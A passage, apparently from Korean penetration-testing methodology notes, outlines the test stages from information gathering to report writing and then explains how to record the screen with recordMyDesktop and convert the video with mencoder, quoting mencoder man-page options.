  홍길동  External/internal penetration test  000-0000-0000
  이순신  Wireless network assessment         000-0000-0000
Stage / Description
  Information gathering    : stage that collects the information observable from outside and checks whether unnecessary services on the target's servers/network/services can be reached
  Vulnerability collection : stage that uses a vulnerability scanner suited to each network segment to collect information on vulnerabilities that may be present (excluding cases that could cause failures of network devices/services)
  Penetration              : stage that, using manual checks based on the information obtained in the vulnerability collection stage, follows scenarios with a chance of penetrating as far as the internal systems
  Detailed analysis        : stage that, when a vulnerability is found, analyses how much impact the security threat from an attack could have on the system and on the business
  Report writing           : stage that writes the report containing the overall assessment, impact, detailed analysis and security guide for the vulnerabilities found
■ Report (scenario writing and check items)
■ Report (overall assessment/summary/details)
[Reference] Screen recording programs
● recordMyDesktop
● gtk-recordMyDesktop
● qt-recordMyDesktop
Applications > System Tools > Add/Remove Software
> Type 'recordmydesktop' in the search field.
-> Result: gtk-recordmydesktop-0.3.8.-4.1
Applications > Sound & Video > run recordMyDesktop
or
# gtk-recordmydesktop
# gtk-recordmydesktop
-> Uncheck the sound quality option; if an error occurs, nothing is captured.
-> Start recording
-> Select stop recording at the top right. Encoding then runs.
-> Select Save As (choose a suitable location (EX: /root/Desktop))
-> Select Quit
Converting the out.ogv file to out.avi
# apt-get install mencoder
# mencoder -idx out.ogv -ovc lavc -o out.avi
-idx (also see -forceidx)
    Rebuilds index of files if no index was found, allowing seeking.
    Useful with broken/incomplete downloads, or badly created files.
    NOTE: This option only works if the underlying media supports
    seeking (i.e. not with stdin, pipe, etc).
-ovc <codec name>
    Encode with the given video codec (no default set).
    NOTE: Use -ovc help to get a list of available video codecs.
    EXAMPLE:
        -ovc copy
            no encoding, just streamcopy
        -ovc raw
            Encode to an arbitrary uncompressed format (use '-vf format' to select).
        -ovc lavc
            Encode with a libavcodec codec.
-o <filename>
    Outputs to the given filename.
    If you want a default output filename, you can put this option
    in the MEncoder config file.